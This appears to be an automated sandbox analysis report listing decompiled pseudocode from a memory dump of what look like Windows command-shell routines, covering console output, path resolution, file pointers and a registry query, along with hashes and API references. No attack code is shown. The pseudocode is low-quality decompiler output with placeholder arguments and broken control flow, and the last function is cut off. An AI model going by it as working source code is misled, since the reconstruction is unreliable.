0x4a74549d
0x4a745495
0x4a735aeb
0x00000000
0x00000000
0x4a735af4
0x4a735afb
0x4a735afe
0x00000000
0x4a7454a6
0x4a735b06
0x4a735b0c
0x4a735b0d
0x00000000

APIs

_wcsnicmp.MSVCRT ref: 4A735AAF
_wcsnicmp.MSVCRT ref: 4A735AC3
wcschr.MSVCRT ref: 4A735AF4

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: _wcsnicmp$wcschr
String ID:
API String ID: 3270668897-0
Opcode ID: ce4185e89fbd873faefcee61e7e0ab766436b8f237ba481a5396622a0d32a15c
Instruction ID: 219692b438195517cbb5857ea51972f0959af58e21207a45b33451a2d5b013b2
Opcode Fuzzy Hash: ce4185e89fbd873faefcee61e7e0ab766436b8f237ba481a5396622a0d32a15c
Instruction Fuzzy Hash: D4415B3259D512BAD7B11B68CC04BF73F69DF09266B534025E982DF182FB508E4EC3A4

Uniqueness

Uniqueness Score: -1.00%

Function 4A73B0F9, Relevance: 6.1, APIs: 4, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 28%

			E4A73B0F9(int __ebx, void* __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				void* __esi;
				void* _t28;
				intOrPtr _t31;
				void* _t37;
				int _t38;
				void* _t41;
				void* _t42;
				void* _t44;
				void* _t54;
				void* _t58;
				intOrPtr _t63;
				signed int _t67;
				signed int _t71;

				_t58 = __edx;
				_t49 = __ebx;
				_t63 = _a4;
				if( *(_t63 + 8) != 0) {
					_push(__ebx);
					_push(__edi);
					if(E4A734490(_t28, 1) != 0) {
						_t60 =  *(_t63 + 0x10);
						_t31 = _t60 +  *(_t63 + 8) * 2;
						_v12 = _t31;
						while(_t60 < _t31) {
							_t49 = _t60;
							if(_t60 >= _t31) {
								goto L6;
							} else {
								while( *_t49 != 0x2022) {
									_t49 = _t49 + 2;
									if(_t49 < _t31) {
										continue;
									}
									break;
								}
								if(_t49 == _t60) {
									goto L17;
								} else {
									_t44 =  &_v8;
									_t71 = _t49 - _t60 >> 1;
									__imp___get_osfhandle(_t60, _t71, _t44, 0);
									_t54 = 1;
									if(WriteConsoleW(_t44, ??, ??, ??, ??) == 0 || _v8 != _t71) {
										L25:
										_t63 = _a4;
										goto L26;
									} else {
										_t63 = _a4;
										_t60 = _t49;
										L17:
										while(_t49 < _v12) {
											if( *_t49 == 0x2022) {
												_t49 = _t49 + 2;
												continue;
											}
											break;
										}
										if(_t49 == _t60) {
											L22:
											_t31 = _v12;
											continue;
										} else {
											E4A74EA77(_t63);
											_t37 =  &_v8;
											_t67 = _t49 - _t60 >> 1;
											__imp___get_osfhandle(_t60, _t67, _t37, 0);
											_t54 = 1;
											_t38 = WriteConsoleW(_t37, ??, ??, ??, ??);
											_t60 = _t38;
											_t39 = E4A731605();
											if(_t38 == 0 || _v8 != _t67) {
												goto L25;
											} else {
												_t63 = _a4;
												_t60 = _t49;
												goto L22;
											}
										}
									}
								}
							}
							goto L33;
						}
						goto L6;
					} else {
						if(E4A73453E( *(_t63 + 8) +  *(_t63 + 8), 1,  *(_t63 + 0x10),  *(_t63 + 8) +  *(_t63 + 8),  &_v16) == 0) {
							L26:
							if(E4A733B03(_t39, _t54, 1) == 0) {
								_t41 = E4A736BEA(_t40, 1);
								if(_t41 == 0) {
									_push(_t41);
									_push(0x70);
									goto L30;
								}
							} else {
								_push(0);
								_push(0x1d);
								L30:
								E4A736D44(_t54);
								_pop(_t54);
							}
							_t42 = E4A74FCA6(_t49, _t54, _t58, _t60, _t63);
							asm("int3");
							_t28 = _t42 + 1;
							return _t28;
						} else {
							_t48 =  *(_t63 + 8);
							_t39 =  *(_t63 + 8) + _t48;
							if(_v16 <  *(_t63 + 8) + _t48) {
								goto L26;
							} else {
								L6:
								goto L2;
							}
						}
					}
				} else {
					L2:
					 *((intOrPtr*)(_t63 + 4)) =  *((intOrPtr*)(_t63 + 4)) + E4A73A8A9(_t63,  *(_t63 + 0x10));
					 *( *(_t63 + 0x10)) = 0;
					 *(_t63 + 8) =  *(_t63 + 8) & 0;
					return 0;
				}
				L33:
			}

0x4a73b0f9
0x4a73b0f9
0x4a73b102
0x4a73b109
0x4a74259d
0x4a74259e
0x4a7425a8
0x4a747a01
0x4a747a07
0x4a747a0a
0x4a747aaf
0x4a747a12
0x4a747a16
0x00000000
0x4a747a1c
0x4a747a1c
0x4a747a27
0x4a747a2a
0x00000000
0x00000000
0x00000000
0x4a747a2a
0x4a747a2e
0x00000000
0x4a747a30
0x4a747a34
0x4a747a3a
0x4a747a40
0x4a747a46
0x4a747a50
0x4a747abc
0x4a747abc
0x00000000
0x4a747a57
0x4a747a57
0x4a747a5a
0x00000000
0x4a747a6a
0x4a747a66
0x4a747a69
0x00000000
0x4a747a69
0x00000000
0x4a747a66
0x4a747a71
0x4a747aac
0x4a747aac
0x00000000
0x4a747a73
0x4a747a74
0x4a747a7d
0x4a747a83
0x4a747a89
0x4a747a8f
0x4a747a91
0x4a747a97
0x4a747a99
0x4a747aa0
0x00000000
0x4a747aa7
0x4a747aa7
0x4a747aaa
0x00000000
0x4a747aaa
0x4a747aa0
0x4a747a71
0x4a747a50
0x4a747a2e
0x00000000
0x4a747a16
0x00000000
0x4a7425ae
0x4a7425c4
0x4a747abf
0x4a747ac8
0x4a747ad2
0x4a747ad9
0x4a747adb
0x4a747adc
0x00000000
0x4a747adc
0x4a747aca
0x4a747aca
0x4a747acc
0x4a747ade
0x4a747ade
0x4a747ae4
0x4a747ae4
0x4a747ae5
0x4a747aea
0x4a747aeb
0x4a73ab93
0x4a7425ca
0x4a7425ca
0x4a7425cd
0x4a7425d2
0x00000000
0x4a7425d8
0x4a7425d8
0x00000000
0x4a7425d9
0x4a7425d2
0x4a7425c4
0x4a73b10f
0x4a73b10f
0x4a73b118
0x4a73b120
0x4a73b123
0x4a73b12a
0x4a73b12a
0x00000000

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d09dc55c9b1ee97bf16965b22d64adc207026b810f9cc9fac48a0f137e4de4d3
Instruction ID: d90b17459438e25a741f9a921bc688f43c59c74d3f5f10ff7057ba29943fadc5
Opcode Fuzzy Hash: d09dc55c9b1ee97bf16965b22d64adc207026b810f9cc9fac48a0f137e4de4d3
Instruction Fuzzy Hash: D4411B72708301AFDB709BB8C849B9B7BB9EF40354F164425E916DB181E671EB8CC7A0

Uniqueness

Uniqueness Score: -1.00%

Function 4A732FAF, Relevance: 6.1, APIs: 4, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E4A732FAF(void* __ecx, WCHAR* _a4, long _a8, WCHAR* _a12) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				WCHAR* _t22;
				intOrPtr* _t28;
				signed int _t30;
				short* _t31;
				WCHAR* _t33;
				int _t36;
				intOrPtr* _t42;
				void* _t45;
				short _t49;
				intOrPtr _t50;
				short _t51;
				short _t53;
				intOrPtr _t54;
				short* _t55;
				void* _t57;
				void* _t58;
				WCHAR* _t60;
				long _t62;
				WCHAR* _t66;
				intOrPtr* _t67;
				short* _t69;

				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t60 = _a12;
				_t22 = _t60;
				_t4 =  &(_t22[1]); // 0x26
				_t55 = _t4;
				_t45 = 2;
				do {
					_t49 =  *_t22;
					_t22 = _t22 + _t45;
				} while (_t49 != 0);
				E4A73185A(_t60, (_t22 - _t55 >> 1) + 1, E4A732598(_t49, _t60));
				_t56 =  *_t60 & 0x0000ffff;
				if(( *_t60 & 0x0000ffff) == 0) {
					_t66 = _a4;
					E4A732C56(_t45, _t56, _t60, _t66, _a8, 0);
					_t67 = _t66 + 4;
					_t28 = _t67;
					_t13 = _t28 + 2; // -2
					_t57 = _t13;
					do {
						_t50 =  *_t28;
						_t28 = _t28 + _t45;
					} while (_t50 != 0);
					_t30 = _t28 - _t57 >> 1;
					if(_t30 < 0x101) {
						if(_t30 != 1) {
							goto L19;
						} else {
						}
					} else {
						 *0x4a754128 = 3;
						goto L21;
					}
				} else {
					_t33 = _t60;
					_t5 =  &(_t33[1]); // 0x26
					_t69 = _t5;
					do {
						_t53 =  *_t33;
						_t33 = _t33 + _t45;
					} while (_t53 != 0);
					if(_t33 - _t69 >> 1 == _t45) {
						if(_t60[1] != 0x3a) {
							goto L6;
						} else {
							_t67 = _a4;
							E4A732C56(_t45, _t56, _t60, _t67, _a8, _t56);
							_t42 = _t67;
							_t17 = _t42 + 2; // 0x2
							_t58 = _t17;
							do {
								_t54 =  *_t42;
								_t42 = _t42 + _t45;
							} while (_t54 != 0);
							_t30 = _t42 - _t58 >> 1;
							if(_t30 > 3) {
								L19:
								_t51 =  *0x4a770664; // 0x5c
								_t31 = _t67 + _t30 * 2;
								 *_t31 = _t51;
								 *((short*)(_t31 + 2)) = 0;
							}
						}
					} else {
						L6:
						_t36 = SetErrorMode(0);
						SetErrorMode(1);
						_t62 = GetFullPathNameW(_t60, _a8, _a4,  &_a12);
						SetErrorMode(_t36);
						if(_t62 == 0 || _t62 > _a8) {
							 *0x4a754128 = 0xce;
							L21:
							_v8 = 1;
						}
					}
				}
				return _v8;
			}

0x4a732fb4
0x4a732fb5
0x4a732fbc
0x4a732fbf
0x4a732fc3
0x4a732fc3
0x4a732fc6
0x4a732fc7
0x4a732fc7
0x4a732fca
0x4a732fcc
0x4a732fe1
0x4a732fe6
0x4a732fec
0x4a74a00a
0x4a74a013
0x4a74a018
0x4a74a01b
0x4a74a01d
0x4a74a01d
0x4a74a020
0x4a74a020
0x4a74a023
0x4a74a025
0x4a74a02c
0x4a74a033
0x4a74a044
0x00000000
0x00000000
0x4a74a046
0x4a74a035
0x4a74a035
0x00000000
0x4a74a035
0x4a732ff2
0x4a732ff2
0x4a732ff4
0x4a732ff4
0x4a732ff7
0x4a732ff7
0x4a732ffa
0x4a732ffc
0x4a733007
0x4a74a050
0x00000000
0x4a74a056
0x4a74a056
0x4a74a05e
0x4a74a063
0x4a74a065
0x4a74a065
0x4a74a068
0x4a74a068
0x4a74a06b
0x4a74a06d
0x4a74a074
0x4a74a079
0x4a74a07f
0x4a74a07f
0x4a74a086
0x4a74a089
0x4a74a08e
0x4a74a08e
0x4a74a079
0x4a73300d
0x4a73300d
0x4a733015
0x4a73301b
0x4a73302f
0x4a733031
0x4a733035
0x4a74a097
0x4a74a0a1
0x4a74a0a1
0x4a74a0a1
0x4a733035
0x4a733007
0x4a73304b

APIs

SetErrorMode.KERNEL32(00000000,00000024,00000025,00000000,00000024,00000104,00000000,?,?,?,4A7396D2,?,00000104,?,00000000,00000104), ref: 4A733015
SetErrorMode.KERNEL32(00000001,?,?,4A7396D2,?,00000104,?,00000000,00000104,00000000,00000208,00000000,00000024,00000000,00000000), ref: 4A73301B
GetFullPathNameW.KERNEL32(00000024,00000000,00000000,00000024,?,?,4A7396D2,?,00000104,?,00000000,00000104,00000000,00000208,00000000,00000024), ref: 4A733028
SetErrorMode.KERNEL32(00000000,?,?,4A7396D2,?,00000104,?,00000000,00000104,00000000,00000208,00000000,00000024,00000000,00000000), ref: 4A733031

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: ErrorMode$FullNamePath
String ID:
API String ID: 268959451-0
Opcode ID: ed860cc3ff3186575f263f386226962d13671a8474887fb1b3a9f0c587470be5
Instruction ID: 6b591a8e3dc7f7397b4135bb02acb4c2f3c47aecc5bc7665727ac1ad2c3dc506
Opcode Fuzzy Hash: ed860cc3ff3186575f263f386226962d13671a8474887fb1b3a9f0c587470be5
Instruction Fuzzy Hash: FB311077604216ABDB308F98CC45ADA7FB9EF85760F068414EA05CF251E375EB48C790

Uniqueness

Uniqueness Score: -1.00%

Function 4A7366BD, Relevance: 6.1, APIs: 4, Instructions: 109
COMMON

Download Yara Rule

C-Code - Quality: 23%

			E4A7366BD(short* __eax, void* __edx, void* __edi) {
				void* __ebx;
				void* __esi;
				short* _t42;
				short* _t43;
				void* _t44;
				void* _t49;
				intOrPtr _t52;
				void* _t55;
				void* _t58;
				void* _t71;
				int _t73;
				void* _t74;
				void* _t80;
				int _t83;
				void* _t86;
				void* _t87;
				void* _t88;
				void* _t89;
				short* _t90;
				void* _t92;
				intOrPtr* _t93;
				int _t104;
				signed int _t106;

				L0:
				while(1) {
					L0:
					_t87 = __edi;
					_t86 = __edx;
					_t42 = __eax;
					if(__eax == 0x4a768640) {
						goto L10;
					}
					L8:
					__eax = __eax - 1;
					__eax = __eax - 1;
					L9:
					 *((intOrPtr*)(_t106 - 0x210)) = _t42;
					if( *_t42 != 0xa) {
						continue;
					}
					L10:
					if( *_t42 != 0x3a) {
						 *((intOrPtr*)(_t106 - 0x210)) = _t42;
					}
					L12:
					_t43 = E4A732B0D(_t42, _t73);
					 *((intOrPtr*)(_t106 - 0x224)) = _t43;
					if( *_t43 == 0x3a) {
						L3:
						_t44 = E4A7318EB( *((intOrPtr*)(_t106 - 0x210)), 0xa);
						_t89 = _t44;
						if(_t89 == _t73) {
							L27:
							__imp___get_osfhandle(1);
							if(SetFilePointer(_t44,  *(_t106 - 0x208), _t73, _t73) ==  *((intOrPtr*)(_t106 - 0x21c))) {
								goto L4;
							}
							L28:
							L30:
							_t83 =  *(_t106 - 0x20c);
							if(_t83 == 0x200) {
								goto L4;
							}
							L31:
							_t104 = _t83 - ( *((intOrPtr*)(_t106 - 0x210)) - 0x4a768640 >> 1);
							_t71 = E4A73661C();
							if(_t71 != 0) {
								_t71 = WideCharToMultiByte( *0x4a7541b8, _t73, 0x4a768640, _t104, _t73, _t73, _t73, _t73);
								_t104 = _t71;
							}
							L33:
							__imp___get_osfhandle(1);
							_t50 = SetFilePointer(_t71,  *(_t106 - 0x208),  ~_t104, _t73);
							L14:
							if( *0x4a7540b8 == 1) {
								L1:
								E4A733AB3( *(_t106 - 0x208));
								_t52 =  *((intOrPtr*)(_t106 - 0x218));
								_pop(_t88);
								_pop(_t92);
								_pop(_t74);
								return E4A7313A9(_t52, _t74,  *(_t106 - 4) ^ _t106, _t86, _t88, _t92);
							} else {
								goto L15;
							}
							while(1) {
								L15:
								E4A734B2A(_t50);
								_t93 = __imp___get_osfhandle;
								_t55 =  *_t93( *(_t106 - 0x208), _t73, _t73, 1);
								_pop(_t80);
								_t56 = SetFilePointer(_t55, ??, ??, ??);
								 *(_t87 + 8) = _t56;
								if(_t56 >=  *((intOrPtr*)(_t106 - 0x228)) &&  *(_t106 - 0x214) == _t73) {
								}
								L24:
								if( *(_t106 - 0x20c) != _t73) {
									L29:
									E4A7357F4(_t56, _t87);
									L40:
									 *0x4a7540b4 =  *((intOrPtr*)(_t87 + 0x110));
									E4A736D44(_t80, 0x400023ab, 1, _t106 - 0x104);
									 *((intOrPtr*)(_t106 - 0x218)) = 1;
									goto L1;
								}
								L25:
								if( *(_t106 - 0x214) == _t73) {
									goto L29;
								}
								L26:
								_t50 = SetFilePointer( *_t93(_t73),  *(_t106 - 0x208), _t73, _t73);
								 *(_t106 - 0x214) = _t73;
								while(1) {
									L15:
									E4A734B2A(_t50);
									_t93 = __imp___get_osfhandle;
									_t55 =  *_t93( *(_t106 - 0x208), _t73, _t73, 1);
									_pop(_t80);
									_t56 = SetFilePointer(_t55, ??, ??, ??);
									 *(_t87 + 8) = _t56;
									if(_t56 >=  *((intOrPtr*)(_t106 - 0x228)) &&  *(_t106 - 0x214) == _t73) {
									}
									goto L17;
								}
								goto L24;
								L17:
								_t58 =  *_t93( *(_t106 - 0x208), 0x4a768640, 0x200, _t106 - 0x20c);
								_pop(_t80);
								_push(_t58);
								if(E4A7367D3() == 0) {
									goto L24;
								}
								L18:
								_t56 =  *(_t106 - 0x20c);
								if(_t56 == _t73) {
									goto L25;
								}
								L19:
								if(_t56 == 0xffffffff ||  *0x4a768640 == _t73 ||  *((intOrPtr*)(_t106 - 0x104)) == _t73) {
									goto L24;
								} else {
									L22:
									0x4a768640[_t56] = 0;
									_t90 = E4A7318EB(0x4a768640, 0x3a);
									if(_t90 == _t73) {
										continue;
									}
									L23:
									_t42 = _t90;
									_t89 = _t90 + 2;
									goto L9;
								}
							}
						}
						L4:
						E4A73654D( *((intOrPtr*)(_t106 - 0x224)), _t106 - 0x204, 0x80, _t73);
						_t49 = _t106 - 0x104;
						__imp___wcsicmp(_t49, _t106 - 0x204);
						if(_t49 != 0) {
							goto L13;
						}
						L5:
						 *0x4a7540b8 =  *( *((intOrPtr*)(_t106 - 0x220)) + 0x40) & 0x00000001;
						_t50 = E4A73661C();
						if(_t89 == _t73) {
							L34:
							if(_t50 == 0) {
								L36:
								_t50 =  *(_t106 - 0x20c);
								L39:
								 *(_t87 + 8) =  *(_t87 + 8) + _t50;
								goto L14;
							}
							L35:
							_push(_t73);
							_push(_t73);
							_push(_t73);
							_push(_t73);
							_push( *(_t106 - 0x20c));
							_push(0x4a768640);
							L38:
							_t50 = WideCharToMultiByte( *0x4a7541b8, _t73, ??, ??, ??, ??, ??, ??);
							goto L39;
						}
						L6:
						if(_t50 != 0) {
							L37:
							_push(_t73);
							_push(_t73);
							_push(_t73);
							_push(_t73);
							_push(_t89 - 0x4a768640 + 2 >> 1);
							_push(0x4a768640);
							goto L38;
						}
						L7:
						 *(_t87 + 8) =  *(_t87 + 8) + (_t89 - 0x4a768640 + 2 >> 1);
						goto L14;
					}
					L13:
					_t90 = E4A7318EB(_t89, 0x3a);
					if(_t90 != _t73) {
						goto L23;
					}
					goto L14;
				}
			}

0x4a7366bd
0x4a7366bd
0x4a7366bd
0x4a7366bd
0x4a7366bd
0x4a7366bd
0x4a7366c2
0x00000000
0x00000000
0x4a7366c4
0x4a7366c4
0x4a7366c5
0x4a7366c6
0x4a7366ca
0x4a7366d0
0x00000000
0x00000000
0x4a7366d2
0x4a7366d6
0x4a7366da
0x4a7366da
0x4a7366e0
0x4a7366e2
0x4a7366eb
0x4a7366f1
0x4a736640
0x4a736648
0x4a73664d
0x4a736651
0x4a7401ad
0x4a7401b7
0x4a7401cb
0x00000000
0x00000000
0x4a7401d1
0x4a744720
0x4a744720
0x4a74472c
0x00000000
0x00000000
0x4a744732
0x4a744741
0x4a744743
0x4a74474a
0x4a74475d
0x4a744763
0x4a744763
0x4a744765
0x4a744771
0x4a744779
0x4a736709
0x4a736710
0x4a736526
0x4a73652c
0x4a736531
0x4a73653a
0x4a73653b
0x4a73653e
0x4a736545
0x00000000
0x00000000
0x00000000
0x4a736716
0x4a736716
0x4a736716
0x4a73671b
0x4a73672b
0x4a73672d
0x4a73672f
0x4a73673b
0x4a73673e
0x4a73673e
0x4a73f3fa
0x4a73f400
0x4a7401de
0x4a7401df
0x4a7447c7
0x4a7447cd
0x4a7447e2
0x4a7447ea
0x00000000
0x4a7447ea
0x4a73f406
0x4a73f40c
0x00000000
0x00000000
0x4a73f412
0x4a73f41f
0x4a73f425
0x4a736716
0x4a736716
0x4a736716
0x4a73671b
0x4a73672b
0x4a73672d
0x4a73672f
0x4a73673b
0x4a73673e
0x4a73673e
0x00000000
0x4a73673e
0x00000000
0x4a73674c
0x4a736763
0x4a736765
0x4a736766
0x4a73676e
0x00000000
0x00000000
0x4a736774
0x4a736774
0x4a73677c
0x00000000
0x00000000
0x4a736782
0x4a736785
0x00000000
0x4a7367a5
0x4a7367a5
0x4a7367ae
0x4a7367bb
0x4a7367bf
0x00000000
0x00000000
0x4a7367c5
0x4a7367c5
0x4a7367c8
0x00000000
0x4a7367c8
0x4a736785
0x4a736716
0x4a736657
0x4a73666a
0x4a736676
0x4a73667d
0x4a736687
0x00000000
0x00000000
0x4a736689
0x4a736694
0x4a736699
0x4a7366a0
0x4a744784
0x4a744786
0x4a744799
0x4a744799
0x4a7447bf
0x4a7447bf
0x00000000
0x4a7447bf
0x4a744788
0x4a744788
0x4a744789
0x4a74478a
0x4a74478b
0x4a74478c
0x4a744792
0x4a7447b2
0x4a7447b9
0x00000000
0x4a7447b9
0x4a7366a6
0x4a7366a8
0x4a7447a1
0x4a7447a1
0x4a7447a9
0x4a7447ab
0x4a7447ad
0x4a7447b0
0x4a7447b1
0x00000000
0x4a7447b1
0x4a7366ae
0x4a7366b8
0x00000000
0x4a7366b8
0x4a7366f7
0x4a7366ff
0x4a736703
0x00000000
0x00000000
0x00000000
0x4a736703

APIs

_get_osfhandle.MSVCRT ref: 4A73672B
SetFilePointer.KERNEL32(00000000), ref: 4A73672F
_get_osfhandle.MSVCRT ref: 4A736763

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: _get_osfhandle$FilePointer
String ID:
API String ID: 2479667682-0
Opcode ID: 3c905f1d5f23a07a2784eb658aa25881ec6d8ab90d7683a61764a12342af6fd6
Instruction ID: 2f3a59938668a7df50b7007ae17f52fcf72c01602959e9d3f9b58eb1609ef4e3
Opcode Fuzzy Hash: 3c905f1d5f23a07a2784eb658aa25881ec6d8ab90d7683a61764a12342af6fd6
Instruction Fuzzy Hash: 3B31C072809A25ABDFB16B60CC987E97FB8EB01390F1341A1D656EB093D7708D89CB51

Uniqueness

Uniqueness Score: -1.00%

Function 4A73D926, Relevance: 6.1, APIs: 4, Instructions: 81
stringCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E4A73D926(void* __ecx, wchar_t* _a4) {
				wchar_t* _v8;
				long _t29;
				int _t30;
				signed int _t31;
				long _t33;
				signed int _t39;
				wchar_t* _t50;
				void* _t52;
				void* _t53;
				void* _t55;
				void* _t56;
				void* _t57;

				_t50 = _a4;
				_t33 = wcstol( *(_t50 + 0x38),  &_a4, 0);
				_t29 = wcstol( *(_t50 + 0x3c),  &_v8, 0);
				if( *_a4 != 0 ||  *_v8 != 0) {
					_push( *(_t50 + 0x3c));
					_push( *(_t50 + 0x38));
					if(( *(_t50 + 0x40) & 0x00000002) != 0) {
						_t30 = lstrcmpiW();
					} else {
						_t30 = lstrcmpW();
					}
				} else {
					_t30 = _t33 - _t29;
				}
				_t52 =  *((intOrPtr*)(_t50 + 0x44)) - 1;
				if(_t52 != 0) {
					_t53 = _t52 - 1;
					if(_t53 == 0) {
						_t39 = 0 | _t30 != 0x00000000;
						goto L5;
					}
					_t55 = _t53 - 1;
					if(_t55 == 0) {
						_t39 = 0 | _t30 < 0x00000000;
						goto L5;
					}
					_t56 = _t55 - 1;
					if(_t56 == 0) {
						_t39 = 0 | _t30 <= 0x00000000;
						goto L5;
					}
					_t57 = _t56 - 1;
					if(_t57 != 0) {
						if(_t57 != 1) {
							_t31 = 0;
							goto L6;
						}
						_t39 = 0 | _t30 >= 0x00000000;
						goto L5;
					}
					_t39 = 0 | _t30 > 0x00000000;
					goto L5;
				} else {
					_t39 = 0 | _t30 == 0x00000000;
					L5:
					_t31 = _t39;
					L6:
					return _t31;
				}
			}

0x4a73d92e
0x4a73d943
0x4a73d94e
0x4a73d95a
0x4a73db9f
0x4a73dba2
0x4a73dba5
0x4a744097
0x4a73dbab
0x4a73dbab
0x4a73dbab
0x4a73d96d
0x4a73d96f
0x4a73d96f
0x4a73d974
0x4a73d975
0x4a73d987
0x4a73d988
0x4a73d9ac
0x00000000
0x4a73d9ac
0x4a73d98a
0x4a73d98b
0x4a73f3e6
0x00000000
0x4a73f3e6
0x4a73d991
0x4a73d992
0x4a73f45a
0x00000000
0x4a73f45a
0x4a73d998
0x4a73d999
0x4a73dbb7
0x4a7440a2
0x00000000
0x4a7440a2
0x4a73dbc1
0x00000000
0x4a73dbc1
0x4a73d9a3
0x00000000
0x4a73d977
0x4a73d97b
0x4a73d97e
0x4a73d97e
0x4a73d980
0x4a73d984
0x4a73d984

APIs

wcstol.MSVCRT ref: 4A73D941
wcstol.MSVCRT ref: 4A73D94E
lstrcmpW.KERNEL32(?,?), ref: 4A73DBAB

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: wcstol$lstrcmp
String ID:
API String ID: 3515581199-0
Opcode ID: ba017630e09af1372f036a10e62fb38356ada7dcf9e12b104bb66fabaf05f355
Instruction ID: 927a3e99f277b9404c76353a9a50ea9e4345ce2e08c7f174c9fa6152947b3fe8
Opcode Fuzzy Hash: ba017630e09af1372f036a10e62fb38356ada7dcf9e12b104bb66fabaf05f355
Instruction Fuzzy Hash: 4E21D87722EE11BBE7B55675CC5176A7EACEF01265F428429E503C28A3E760DD04C790

Uniqueness

Uniqueness Score: -1.00%

Function 4A735932, Relevance: 6.1, APIs: 4, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 21%

			E4A735932(short* _a4, char _a8) {
				signed int _v8;
				void* __ecx;
				void* _t12;
				signed int _t13;
				void* _t14;
				long _t17;
				void* _t28;
				long _t38;

				_push(_t28);
				_v8 = _v8 & 0x00000000;
				_t38 = _a8;
				if(_t38 <= 0) {
					L4:
					_t13 = _v8;
					L5:
					return _t13;
				}
				_t14 = E4A734490(_t12, 1);
				_t15 =  &_a8;
				if(_t14 != 0) {
					__imp___get_osfhandle(1, _a4, _t38, _t15, 0);
					_pop(_t28);
					if(WriteConsoleW(_t15, ??, ??, ??, ??) != 0) {
						L3:
						if(_a8 != _t38) {
							L9:
							_t17 = GetLastError();
							_v8 = _t17;
							if(_t17 == 0) {
								_v8 = 0x70;
							}
							if(E4A733B03(_t17, _t28, 1) == 0) {
								if(E4A736BEA(_t18, 1) == 0) {
									E4A74056B(_v8);
								} else {
									_push(0);
									_push(0x2364);
									E4A736D44(_t28);
								}
								_t13 = 1;
								goto L5;
							}
							_push(0);
							_push(0x1d);
							E4A736D44(_t28);
						}
						goto L4;
					}
					GetLastError();
					goto L9;
				}
				_t38 = _t38 + _t38;
				if(E4A73453E( &_a8, 1, _a4, _t38,  &_a8) == 0) {
					goto L9;
				}
				goto L3;
			}

0x4a735937
0x4a735938
0x4a73593e
0x4a735944
0x4a73597e
0x4a73597e
0x4a735981
0x4a735985
0x4a735985
0x4a73594a
0x4a735957
0x4a73595a
0x4a736de7
0x4a736ded
0x4a736df7
0x4a735975
0x4a735978
0x4a749e3a
0x4a749e3a
0x4a749e3c
0x4a749e41
0x4a749e43
0x4a749e43
0x4a749e52
0x4a749e6c
0x4a749e86
0x4a749e6e
0x4a749e6e
0x4a749e70
0x4a749e75
0x4a749e7b
0x4a749e7c
0x00000000
0x4a749e7c
0x4a749e54
0x4a749e56
0x4a749e58
0x4a749e5e
0x00000000
0x4a735978
0x4a749e38
0x00000000
0x4a749e38
0x4a735961
0x4a73596f
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 4A734490: _get_osfhandle.MSVCRT ref: 4A73449A
Part of subcall function 4A734490: GetFileType.KERNEL32(00000000), ref: 4A7344A9

_get_osfhandle.MSVCRT ref: 4A736DE7
WriteConsoleW.KERNEL32 ref: 4A736DEF
GetLastError.KERNEL32(?,4A744FE5,%s %s ,?,?), ref: 4A749E38
GetLastError.KERNEL32(?,4A744FE5,%s %s ,?,?), ref: 4A749E3A

Part of subcall function 4A73453E: _get_osfhandle.MSVCRT ref: 4A734550
Part of subcall function 4A73453E: WideCharToMultiByte.KERNEL32(00000000,?,000000FF,4A756640,00002000,00000000,00000000,00000001,?,?,4A73596D,00000001,?,?,?,00000001), ref: 4A73459B
Part of subcall function 4A73453E: WriteFile.KERNEL32(?,4A756640,-00000001,4A744FE5,00000000), ref: 4A7345AE

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: _get_osfhandle$ErrorFileLastWrite$ByteCharConsoleMultiTypeWide
String ID:
API String ID: 3517615490-0
Opcode ID: 3eadf4a734b660c0baffe900753b0dc352f7fdf8ef6c32ad957d28bac19b01dd
Instruction ID: 1ebdd3bdec50a0f3b735d2cbe088b6c375a137ab473639b6516dcb143d105d36
Opcode Fuzzy Hash: 3eadf4a734b660c0baffe900753b0dc352f7fdf8ef6c32ad957d28bac19b01dd
Instruction Fuzzy Hash: 3E11213364D215BBEB319AA1CC49FDF3F6CDB41AA1F124016F805DA082DB34DA09D724

Uniqueness

Uniqueness Score: -1.00%

Function 4A74D003, Relevance: 6.1, APIs: 4, Instructions: 73
registryCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E4A74D003(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				short* _t21;
				long _t24;
				char* _t35;
				void* _t36;
				long _t40;
				void* _t43;

				_push(0x14);
				_push(0x4a74d0d8);
				E4A73264A(__ebx, __edi, __esi);
				 *(_t43 - 0x20) = 0;
				 *(_t43 - 0x24) = 0;
				_t36 =  *(_t43 + 8);
				 *(_t43 - 0x1c) = _t36;
				 *((intOrPtr*)(_t43 - 4)) = 0;
				_t21 =  *(_t43 + 0xc);
				if(_t21 == 0 ||  *_t21 == 0) {
					L4:
					_t24 = RegQueryValueExW( *(_t43 - 0x1c), 0, 0, _t43 + 0xc, 0, _t43 - 0x24);
					if(_t24 != 2) {
						if(_t24 != 0) {
							goto L3;
						} else {
